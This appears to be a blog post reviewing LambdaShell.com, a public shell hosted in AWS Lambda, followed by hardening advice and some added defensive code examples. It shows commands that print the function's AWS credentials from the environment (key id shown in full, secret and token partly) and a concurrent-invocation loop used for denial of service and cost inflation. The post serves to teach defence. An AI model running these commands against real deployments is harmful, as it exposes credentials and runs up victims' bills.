Looking at LambdaShell.com after 3+ years

Terminal

Functions

user@host:~ echo $AWS_EXECUTION_ENV
AWS_Lambda_nodejs12.x
Lambda Shell’s index.js

Permissions

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": "logs:CreateLogGroup",
      "Resource": "arn:aws:logs:us-east-1:123456789012:*"
    },
    {
      "Effect": "Allow",
      "Action": [
        "logs:CreateLogStream",
        "logs:PutLogEvents"
      ],
      "Resource": [
        "arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/example:*"
      ]
    }
  ]
}
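The policy above is already scoped to one log group, which is what the post's conclusion asks for. As an added example (not code from the original post or from LambdaShell), the following small linter flags the two patterns that conclusion warns about, a bare "*" Resource and wildcard Actions. The sample policy is the post's logging policy plus one deliberately over-broad statement, constructed here for illustration; the function names are my own.

```javascript
// Added example, not from the original post: a small IAM policy linter that
// flags Allow statements with Resource "*" or wildcard Actions.

// Sample input (constructed): the post's logging policy plus one over-broad
// statement of the kind the conclusion warns against.
const SAMPLE_POLICY = {
  Version: "2012-10-17",
  Statement: [
    {
      Effect: "Allow",
      Action: "logs:CreateLogGroup",
      Resource: "arn:aws:logs:us-east-1:123456789012:*",
    },
    {
      Effect: "Allow",
      Action: ["logs:CreateLogStream", "logs:PutLogEvents"],
      Resource: ["arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/example:*"],
    },
    // Constructed over-broad statement: every S3 action on every resource.
    { Effect: "Allow", Action: "s3:*", Resource: "*" },
  ],
};

// IAM lets Action and Resource be a single string or an array; normalise.
function asList(value) {
  if (value === undefined) return [];
  return Array.isArray(value) ? value : [value];
}

// Returns one finding per problem, each naming the statement index it is in.
// Deny statements are skipped because they only narrow access.
function lintPolicy(policy) {
  const findings = [];
  asList(policy.Statement).forEach((stmt, index) => {
    if (stmt.Effect !== "Allow") return;
    const actions = asList(stmt.Action);
    const resources = asList(stmt.Resource);
    if (resources.includes("*")) {
      findings.push({ statement: index, issue: 'Resource is "*"' });
    }
    const wildActions = actions.filter((a) => a === "*" || a.endsWith(":*"));
    if (wildActions.length > 0) {
      findings.push({ statement: index, issue: `wildcard Action: ${wildActions.join(", ")}` });
    }
  });
  return findings;
}

// Usage: lintPolicy(SAMPLE_POLICY) reports two findings, both on statement 2;
// the first two statements alone produce none.
```

The check is intentionally narrow: an ARN that ends in a wildcard within one account, region and service (as in the first statement) is not flagged, only the bare "*" that grants a resource-agnostic permission.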
user@host:~ export | awk '/ACCESS|SECRET|REGION|TOKEN/'
export AWS_ACCESS_KEY_ID="ASIARZMXIAFTJE4ZPUFD"
export AWS_DEFAULT_REGION="us-west-1"
export AWS_REGION="us-west-1"
export AWS_SECRET_ACCESS_KEY="2EpQgqqOQOF1+W...doNkkRDqJklWCV9"
export AWS_SESSION_TOKEN="IQoJb3JpZ2luX2VjE...Yyd/fKl8zzP3ZnQA=="

Lambda

Redis

API Gateway

X-Ray

user@host:~ echo $_X_AMZN_TRACE_ID
Root=1-61c329d4-6bc7e7421dee02f5235e9cc4;Parent=67bab5d2e727bc1d;Sampled=1

Logs

Denial of service

user@host:~ sleep 16m
2021-12-22T14:41:40.843Z cef17277-fb37-4f18-a10d-edeb969ad426 Task timed out after 10.01 seconds
for i in {1..10}; do aws lambda invoke --function-name exec \
--payload '{"body":{"command":"sleep 10s"}}' \
--cli-binary-format raw-in-base64-out /dev/null & done

Spend

Lambda

cat /var/runtime/*.** && cat /var/runtime/*.** && cat /var/runtime/*.** && cat /var/runtime/*.** && cat /var/runtime/*.** && cat /var/runtime/*.**

X-Ray

CloudWatch Logs

CloudWatch Metrics

{
  "_aws": {
    "Timestamp": 1574109732004,
    "CloudWatchMetrics": [
      {
        "Namespace": "lambda-function-metrics",
        "Dimensions": [["functionVersion"]],
        "Metrics": [
          {
            "Name": "time",
            "Unit": "Milliseconds"
          }
        ]
      }
    ]
  },
  "functionVersion": "$LATEST",
  "time": 100,
  "requestId": "989ffbf8-9ace-4817-a57c-e4dd734019ee"
}
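The record above is CloudWatch's embedded metric format: the "_aws" block declares a namespace, dimension names and metric names, and every declared name must also appear as a top-level key carrying its value. As an added example (not code from the original post), the helper below builds such a record for an invocation's elapsed time and checks that declaration and values agree before the record is logged. The namespace, dimension and metric names are taken from the sample record; the helper names and the request id in the usage are constructed.

```javascript
// Added example, not from the original post: build and validate a CloudWatch
// embedded metric format (EMF) record shaped like the one shown above.

// Build an EMF record. The "_aws" block declares the metrics; the dimension
// and metric values are placed at the top level under the same names.
function buildEmfRecord({ namespace, dimensions, metrics, timestamp }) {
  const record = {
    _aws: {
      Timestamp: timestamp,
      CloudWatchMetrics: [
        {
          Namespace: namespace,
          Dimensions: [Object.keys(dimensions)],
          Metrics: metrics.map(({ name, unit }) => ({ Name: name, Unit: unit })),
        },
      ],
    },
  };
  Object.assign(record, dimensions);
  for (const { name, value } of metrics) record[name] = value;
  return record;
}

// True when every declared dimension and metric has a top-level value.
// A record that fails this check is logged but never becomes a metric.
function validateEmfRecord(record) {
  const decl = record._aws.CloudWatchMetrics[0];
  const names = [...decl.Dimensions.flat(), ...decl.Metrics.map((m) => m.Name)];
  return names.every((n) => Object.prototype.hasOwnProperty.call(record, n));
}

// Convenience wrapper for the post's use case: elapsed time of one invocation
// under the "lambda-function-metrics" namespace, tagged with the request id.
function elapsedRecord(startMs, endMs, functionVersion, requestId) {
  const record = buildEmfRecord({
    namespace: "lambda-function-metrics",
    dimensions: { functionVersion },
    metrics: [{ name: "time", unit: "Milliseconds", value: endMs - startMs }],
    timestamp: endMs,
  });
  record.requestId = requestId; // extra fields are kept as log properties
  return record;
}

// Usage inside a handler (request id constructed for this example):
//   const t0 = Date.now();
//   ... do the work ...
//   const rec = elapsedRecord(t0, Date.now(), "$LATEST", "00000000-0000-0000-0000-000000000000");
//   if (validateEmfRecord(rec)) console.log(JSON.stringify(rec));
```

Because the record is just a log line, anything with permission to write to the function's log group can emit metrics into that namespace; that is the same logs:PutLogEvents permission the policy above already grants.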

Bonus: S3

Conclusion

  • Do what you can to keep even the most basic credentials secure.
  • Sanitize user inputs and outputs to avoid leaking credentials.
  • Ensure you have billing alarms configured to catch anything like this ASAP.
  • Follow the principle of least privilege (remove unnecessary permissions and don’t use "*" as a resource in an IAM policy).
  • Apply throttling and limits where possible.
  • Be aware of all regions, not just the one you expect resources to exist in.
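The second bullet is the one a shell-in-a-function most directly needs: the "export | awk" output earlier shows that the function's own temporary credentials sit in the environment and go straight back to the browser. As an added example (not code from the original post or from LambdaShell), the filter below redacts AWS access key ids and the values of the secret key and session token variables before command output is returned, and counts what it removed so the event can be logged. The sample output is constructed from the shapes shown in the post; the key id and secret values are AWS-style placeholders, not real credentials, and the function names are my own.

```javascript
// Added example, not from the original post: redact AWS credential material
// from command output before it is returned to a user.

// Constructed sample of what a shell inside the function might print.
// The values are placeholders in the AWS formats; none are real credentials.
const SAMPLE_OUTPUT = [
  'export AWS_ACCESS_KEY_ID="ASIAEXAMPLEEXAMPLE01"',
  'export AWS_DEFAULT_REGION="us-west-1"',
  'export AWS_SECRET_ACCESS_KEY="wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"',
  'export AWS_SESSION_TOKEN="IQoJb3JpZ2luX2VjEXAMPLE=="',
  "Root=1-61c329d4-6bc7e7421dee02f5235e9cc4;Parent=67bab5d2e727bc1d;Sampled=1",
].join("\n");

// Each rule is a pattern plus its replacement. The key id rule matches the
// AKIA/ASIA prefix and 16 following characters wherever it appears; the
// variable rule blanks the value (quoted or not) of the two secret variables.
const RULES = [
  {
    name: "access key id",
    re: /\b(?:AKIA|ASIA)[A-Z0-9]{16}\b/g,
    replace: "[REDACTED_ACCESS_KEY_ID]",
  },
  {
    name: "secret or session token",
    re: /(AWS_SECRET_ACCESS_KEY|AWS_SESSION_TOKEN)=("?)[^"\s]*\2/g,
    replace: "$1=$2[REDACTED]$2",
  },
];

// Returns the redacted text and a per-rule count of replacements, so the
// caller can both respond safely and record that a leak was attempted.
function redactCredentials(text) {
  const counts = {};
  let out = text;
  for (const rule of RULES) {
    counts[rule.name] = (out.match(rule.re) || []).length;
    out = out.replace(rule.re, rule.replace);
  }
  return { text: out, counts };
}

// Usage: redactCredentials(SAMPLE_OUTPUT).text keeps the region line and the
// X-Ray trace id untouched and blanks the three credential values.
```

Pattern matching on output is a second line of defence, not a substitute for the first bullet; the region variable and the trace id pass through unchanged because they are not secrets, while anything that looks like a key id is removed even when it appears outside an export line.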
